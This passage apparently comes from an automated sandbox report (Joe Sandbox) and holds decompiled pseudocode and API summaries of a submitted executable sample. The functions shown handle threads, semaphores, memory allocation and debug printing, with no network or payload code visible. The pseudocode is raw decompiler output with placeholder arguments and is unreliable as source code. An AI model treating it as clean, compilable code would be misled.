                                                                                                                                                                                                                                                                                                        							E00412210();
                                                                                                                                                                                                                                                                                                        							if( *((intOrPtr*)(_t56 + 0x70)) == 0) {
                                                                                                                                                                                                                                                                                                        								_v72 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        								 *_t67 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                                                                                                                                                                                                                                        								WaitForSingleObject(??, ??);
                                                                                                                                                                                                                                                                                                        								_t67 = _t67 - 8;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *_t67 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                                                                                                                                                                                                                                        							CloseHandle(??);
                                                                                                                                                                                                                                                                                                        							_t44 =  *((intOrPtr*)(_t56 + 0x18));
                                                                                                                                                                                                                                                                                                        							_t68 = _t67 - 4;
                                                                                                                                                                                                                                                                                                        							if(_t44 != 0) {
                                                                                                                                                                                                                                                                                                        								 *_t68 = _t44;
                                                                                                                                                                                                                                                                                                        								CloseHandle(??);
                                                                                                                                                                                                                                                                                                        								_t68 = _t68 - 4;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t56 + 0x18)) = 0;
                                                                                                                                                                                                                                                                                                        							if(_a8 != 0) {
                                                                                                                                                                                                                                                                                                        								 *_a8 =  *((intOrPtr*)(_t56 + 4));
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t64 = 0;
                                                                                                                                                                                                                                                                                                        							 *_t68 = _t56 + 0x1c;
                                                                                                                                                                                                                                                                                                        							E004140E0();
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t56 + 0x34)) = _v44;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t56 + 0x38)) = _v40;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t56 + 0x3c)) = _v36;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t56 + 0x40)) = _v32;
                                                                                                                                                                                                                                                                                                        							if( *((intOrPtr*)(_t56 + 0xb8)) == 0) {
                                                                                                                                                                                                                                                                                                        								E0040FD20(_t56);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				goto L3;
                                                                                                                                                                                                                                                                                                        			}


























                                                                                                                                                                                                                                                                                                        0x00412d80
                                                                                                                                                                                                                                                                                                        0x00412d89
                                                                                                                                                                                                                                                                                                        0x00412d8c
                                                                                                                                                                                                                                                                                                        0x00412d8f
                                                                                                                                                                                                                                                                                                        0x00412d94
                                                                                                                                                                                                                                                                                                        0x00412d9b
                                                                                                                                                                                                                                                                                                        0x00412da2
                                                                                                                                                                                                                                                                                                        0x00412da9
                                                                                                                                                                                                                                                                                                        0x00412db2
                                                                                                                                                                                                                                                                                                        0x00412db4
                                                                                                                                                                                                                                                                                                        0x00412dd4
                                                                                                                                                                                                                                                                                                        0x00412dd4
                                                                                                                                                                                                                                                                                                        0x00412dd9
                                                                                                                                                                                                                                                                                                        0x00412de2
                                                                                                                                                                                                                                                                                                        0x00412de2
                                                                                                                                                                                                                                                                                                        0x00412db6
                                                                                                                                                                                                                                                                                                        0x00412dbb
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412dc0
                                                                                                                                                                                                                                                                                                        0x00412dc4
                                                                                                                                                                                                                                                                                                        0x00412dc7
                                                                                                                                                                                                                                                                                                        0x00412dcd
                                                                                                                                                                                                                                                                                                        0x00412dd2
                                                                                                                                                                                                                                                                                                        0x00412de7
                                                                                                                                                                                                                                                                                                        0x00412dec
                                                                                                                                                                                                                                                                                                        0x00412dee
                                                                                                                                                                                                                                                                                                        0x00412df5
                                                                                                                                                                                                                                                                                                        0x00412e8b
                                                                                                                                                                                                                                                                                                        0x00412dfb
                                                                                                                                                                                                                                                                                                        0x00412dfb
                                                                                                                                                                                                                                                                                                        0x00412dfb
                                                                                                                                                                                                                                                                                                        0x00412e03
                                                                                                                                                                                                                                                                                                        0x00412e08
                                                                                                                                                                                                                                                                                                        0x00412e0a
                                                                                                                                                                                                                                                                                                        0x00412e14
                                                                                                                                                                                                                                                                                                        0x00412e95
                                                                                                                                                                                                                                                                                                        0x00412ea0
                                                                                                                                                                                                                                                                                                        0x00412ea3
                                                                                                                                                                                                                                                                                                        0x00412ea9
                                                                                                                                                                                                                                                                                                        0x00412ea9
                                                                                                                                                                                                                                                                                                        0x00412e1f
                                                                                                                                                                                                                                                                                                        0x00412e22
                                                                                                                                                                                                                                                                                                        0x00412e24
                                                                                                                                                                                                                                                                                                        0x00412e27
                                                                                                                                                                                                                                                                                                        0x00412e2c
                                                                                                                                                                                                                                                                                                        0x00412e2e
                                                                                                                                                                                                                                                                                                        0x00412e31
                                                                                                                                                                                                                                                                                                        0x00412e33
                                                                                                                                                                                                                                                                                                        0x00412e33
                                                                                                                                                                                                                                                                                                        0x00412e39
                                                                                                                                                                                                                                                                                                        0x00412e42
                                                                                                                                                                                                                                                                                                        0x00412e4a
                                                                                                                                                                                                                                                                                                        0x00412e4a
                                                                                                                                                                                                                                                                                                        0x00412e4f
                                                                                                                                                                                                                                                                                                        0x00412e51
                                                                                                                                                                                                                                                                                                        0x00412e54
                                                                                                                                                                                                                                                                                                        0x00412e5c
                                                                                                                                                                                                                                                                                                        0x00412e62
                                                                                                                                                                                                                                                                                                        0x00412e68
                                                                                                                                                                                                                                                                                                        0x00412e6e
                                                                                                                                                                                                                                                                                                        0x00412e79
                                                                                                                                                                                                                                                                                                        0x00412e81
                                                                                                                                                                                                                                                                                                        0x00412e81
                                                                                                                                                                                                                                                                                                        0x00412e79
                                                                                                                                                                                                                                                                                                        0x00412e08
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00412dec
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Handle$Close$InformationObjectSingleWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 135186658-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e5a4b129ae92d8d88fee5e4004c5104fc19af652de718fde7cfc4be735879905
                                                                                                                                                                                                                                                                                                        • Instruction ID: eefc78a76a067577111aecbaeb0e7de47b452a34a27c7b211ac7547dace962ae
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5a4b129ae92d8d88fee5e4004c5104fc19af652de718fde7cfc4be735879905
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8312A74A003088BDB50EF69D6847DABBF4EF08310F04856AEC45EB345E779E895CB99
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ReleaseSemaphore.KERNEL32(?,?,?,?,FFFFFFFF,?,0040FB75), ref: 00413A4C
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413A77
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413AA4
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentThread$ReleaseSemaphore
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1483290962-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 843eff9c7fa453a6a21d8273f9d8158aafe4b9fad93c285ff7858f719f287fa3
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6b0b4afb1b3186992077eecdeaba32eded2b69c28accb2d6c45d86a2178ee7f6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 843eff9c7fa453a6a21d8273f9d8158aafe4b9fad93c285ff7858f719f287fa3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA2171357006058BDB20DF69D98439BB7B4EF40396F14843AD88687344E735EA86CB96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • calloc.MSVCRT ref: 0041515D
                                                                                                                                                                                                                                                                                                        • free.MSVCRT(?,?,?,FFFFFFFF,?,004152D5), ref: 004151EB
                                                                                                                                                                                                                                                                                                        • free.MSVCRT(?,?,?,FFFFFFFF,?,004152D5), ref: 0041520F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416080: calloc.MSVCRT ref: 004160BA
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416080: CreateSemaphoreA.KERNEL32 ref: 0041610E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416080: CreateSemaphoreA.KERNEL32 ref: 00416135
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416080: InitializeCriticalSection.KERNEL32 ref: 00416154
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416080: InitializeCriticalSection.KERNEL32 ref: 0041615F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00416080: InitializeCriticalSection.KERNEL32 ref: 0041616A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$CreateSemaphorecallocfree
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1811228352-3916222277
                                                                                                                                                                                                                                                                                                        • Opcode ID: 06ab00d90bc0c1de9f3d0d47dfa7f8a1f794360472c3a7af2a8bae076d9c70e2
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4128b646aaba891ada79dfd1a06888151aadab1d0cf51ac5d6bc289caab5bcc4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06ab00d90bc0c1de9f3d0d47dfa7f8a1f794360472c3a7af2a8bae076d9c70e2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC217FB16047049FD710AF26D48039BBBE4EF84358F458C6EE9888B342E77DC994CB96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateSemaphorecalloc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 194818478-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: be592ff54935ea022d8ad1b5f88709ccb93884ab102ce677d5da886c338de866
                                                                                                                                                                                                                                                                                                        • Instruction ID: 00fe0f0be2da5e732bebc1b04f87b074566867ad18d38b5108f8291d3f12238d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be592ff54935ea022d8ad1b5f88709ccb93884ab102ce677d5da886c338de866
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A121DA71604305DFEB109F59C48438ABBE4EF40369F14886AED58CB386FB78D984CB95
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentThreadprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2356641437-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 57ee4d070de15427d656353f7a16ca92c078416b7c61adaa258012ce0576d536
                                                                                                                                                                                                                                                                                                        • Instruction ID: 611bf596c6e15f060a768f0ba072d44477f6cdd3d242876fe9a2c858f071f05c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 57ee4d070de15427d656353f7a16ca92c078416b7c61adaa258012ce0576d536
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB2168B8A093009F8344DF1AD58481AFBE5FF89760F55896EF88897321D374E941CF9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: __dllonexit_lock_onexit_unlock
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 209411981-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8b1b58f89a79551562e3bfa36572f0ebcdc3d5ed823508bc3b8ba4bd712296a5
                                                                                                                                                                                                                                                                                                        • Instruction ID: da490afd404eaf5b5c0649b7776465ff8fabc6fec02763ed850c7dc601e45c55
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b1b58f89a79551562e3bfa36572f0ebcdc3d5ed823508bc3b8ba4bd712296a5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF11A2B0A08301CBD700FF75E4C561EBBE0AB48344F904E3EF8D497391E67895888B8A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentThreadfprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1384477639-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: dd6456fad9106398484d637a3b56d121495990f21139275fff810eafb9fbd7cc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7d9a7ceed94e7cb146748a6a4cbe518f00b590a44153bc146dcbe4ea3ecfc3d4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd6456fad9106398484d637a3b56d121495990f21139275fff810eafb9fbd7cc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4711B378A087019FC700DF15D58851ABBE4FFC9714F54882EE98887325D774A949CF9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 17%
                                                                                                                                                                                                                                                                                                        			E00410FD0(char* _a4, long _a8, intOrPtr _a12, intOrPtr _a52) {
                                                                                                                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				long _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				long _t16;
                                                                                                                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                                                                                                                        				char** _t40;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t30 =  *0x422440; // 0x0
                                                                                                                                                                                                                                                                                                        				if(_t30 == 0) {
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					asm("repe ret");
                                                                                                                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                                                                                                                        					_t16 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                                        					_a4 = 0;
                                                                                                                                                                                                                                                                                                        					 *_t40 = "T%p %d %s\n";
                                                                                                                                                                                                                                                                                                        					_a12 = _a52;
                                                                                                                                                                                                                                                                                                        					_a8 = _t16;
                                                                                                                                                                                                                                                                                                        					printf(??);
                                                                                                                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                                                                                                                        					_t40 =  &(_t40[8]);
                                                                                                                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_t40 = _t40 - 0x20;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0) {
                                                                                                                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				 *_t40 = _a4;
                                                                                                                                                                                                                                                                                                        				_t20 = E004107C0(_t32);
                                                                                                                                                                                                                                                                                                        				 *_t40 = _a4;
                                                                                                                                                                                                                                                                                                        				_t22 = E004107C0(_t32);
                                                                                                                                                                                                                                                                                                        				_t23 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                                        				 *_t40 = _a4;
                                                                                                                                                                                                                                                                                                        				_t25 = E004107C0(_t32);
                                                                                                                                                                                                                                                                                                        				_v28 =  *((intOrPtr*)(_t20 + 0x14));
                                                                                                                                                                                                                                                                                                        				_v32 =  *_t22;
                                                                                                                                                                                                                                                                                                        				_v36 = _t23;
                                                                                                                                                                                                                                                                                                        				_v24 = _a8;
                                                                                                                                                                                                                                                                                                        				 *_t40 = "T%p %d V=%0X H=%p %s\n";
                                                                                                                                                                                                                                                                                                        				_v40 = _t25;
                                                                                                                                                                                                                                                                                                        				printf(??);
                                                                                                                                                                                                                                                                                                        				goto L3;
                                                                                                                                                                                                                                                                                                        			}
















                                                                                                                                                                                                                                                                                                        0x00410fd0
                                                                                                                                                                                                                                                                                                        0x00410fd8
                                                                                                                                                                                                                                                                                                        0x00411043
                                                                                                                                                                                                                                                                                                        0x00411043
                                                                                                                                                                                                                                                                                                        0x00411045
                                                                                                                                                                                                                                                                                                        0x00411045
                                                                                                                                                                                                                                                                                                        0x0041104f
                                                                                                                                                                                                                                                                                                        0x00411057
                                                                                                                                                                                                                                                                                                        0x0041105e
                                                                                                                                                                                                                                                                                                        0x00411062
                                                                                                                                                                                                                                                                                                        0x00411066
                                                                                                                                                                                                                                                                                                        0x0041103d
                                                                                                                                                                                                                                                                                                        0x0041103d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00411042
                                                                                                                                                                                                                                                                                                        0x00410fdd
                                                                                                                                                                                                                                                                                                        0x00410fe6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00410fec
                                                                                                                                                                                                                                                                                                        0x00410fef
                                                                                                                                                                                                                                                                                                        0x00410ffb
                                                                                                                                                                                                                                                                                                        0x00410ffe
                                                                                                                                                                                                                                                                                                        0x00411005
                                                                                                                                                                                                                                                                                                        0x00411011
                                                                                                                                                                                                                                                                                                        0x00411014
                                                                                                                                                                                                                                                                                                        0x0041101d
                                                                                                                                                                                                                                                                                                        0x00411021
                                                                                                                                                                                                                                                                                                        0x00411025
                                                                                                                                                                                                                                                                                                        0x00411029
                                                                                                                                                                                                                                                                                                        0x0041102d
                                                                                                                                                                                                                                                                                                        0x00411034
                                                                                                                                                                                                                                                                                                        0x00411038
                                                                                                                                                                                                                                                                                                        0x00000000

